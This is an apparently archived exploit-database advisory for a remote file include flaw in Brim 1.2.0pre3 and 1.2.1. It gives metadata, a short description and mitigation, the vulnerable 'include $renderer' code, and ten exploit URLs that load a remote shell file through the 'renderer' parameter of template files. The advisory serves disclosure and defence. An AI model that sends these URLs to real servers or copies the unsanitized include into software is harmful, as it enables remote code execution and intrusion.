Brim 1.2.0pre3, 1.2.1 renderer Remote File Include Vulnerability

vendor:

Brim

by:

mdx and The_Bat_Hacker

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: Brim

Affected Version From: 1.2.0pre3

Affected Version To: 1.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:brim_project:brim

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Brim 1.2.0pre3, 1.2.1 renderer Remote File Include Vulnerability

Brim 1.2.0pre3 and 1.2.1 are vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute arbitrary code on the vulnerable server. The vulnerability exists due to the use of the 'renderer' parameter in multiple template files. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to a victim. If the victim visits the malicious URL, the attacker-supplied file will be included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

#                     Brim 1.2.0pre3 , 1.2.1           #
#       renderer Remote File Include Vulnerability     #
#                       Turkish Hacker's               #
#       Discovered By : mdx and The_Bat_Hacker         #
#                                                      #
#------------------------------------------------------
#               Cyber-Warrior TIM                      #
#         Ay ve  Y.ld.zlar Geceye Yak...r...           #
#        the moon and the stars suit the night         #
########################################################
#
# Class : REmote
########################################################
#             File Code Detailed
#File1 :templates/barrel/template.tpl.php?
#File1 :templates/sidebar/template.tpl.php?
#File1 :templates/text-only/template.tpl.php?
#File1 :templates/slashdot/template.tpl.php?
#File1 :templates/penguin/template.tpl.php?
#File1 :templates/pda/template.tpl.php?
#File1 :templates/oerdec/template.tpl.php?
#File1 :templates/nifty/template.tpl.php?
#File1 :templates/mylook/template.tpl.php?
#File1 :templates/barry/template.tpl.php?
#Code :
#
#   <?php include $renderer; ?>
#
########################################################
#
#
# Exploit1 : http://www.target.***/[path]/templates/barrel/template.tpl.php?renderer=http://shell.txt?
# Exploit2 : http://www.target.***/[path]/templates/sidebar/template.tpl.php?renderer=http://shell.txt?
# Exploit3 : http://www.target.***/[path]/templates/text-only/template.tpl.php?renderer=http://shell.txt?
# Exploit4 : http://www.target.***/[path]/templates/slashdot/template.tpl.php?renderer=http://shell.txt?
# Exploit5 : http://www.target.***/[path]/templates/penguin/template.tpl.php?renderer=http://shell.txt?
# Exploit6 : http://www.target.***/[path]/templates/pda/template.tpl.php?renderer=http://shell.txt?
# Exploit7 : http://www.target.***/[path]/templates/oerdec/template.tpl.php?renderer=http://shell.txt?
# Exploit8 : http://www.target.***/[path]/templates/nifty/template.tpl.php?renderer=http://shell.txt?
# Exploit9 : http://www.target.***/[path]/templates/mylook/template.tpl.php?renderer=http://shell.txt?
# Exploit1 : http://www.target.***/[path]/templates/barry/template.tpl.php?renderer=http://shell.txt?
#
########################################################
#                         _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy,Ulubatl. All Friends
########################################################

http://prdownloads.sourceforge.net/brim/brimfull-1.2.1-16_Oct_2006.zip?use_mirror=heanet

# milw0rm.com [2006-10-17]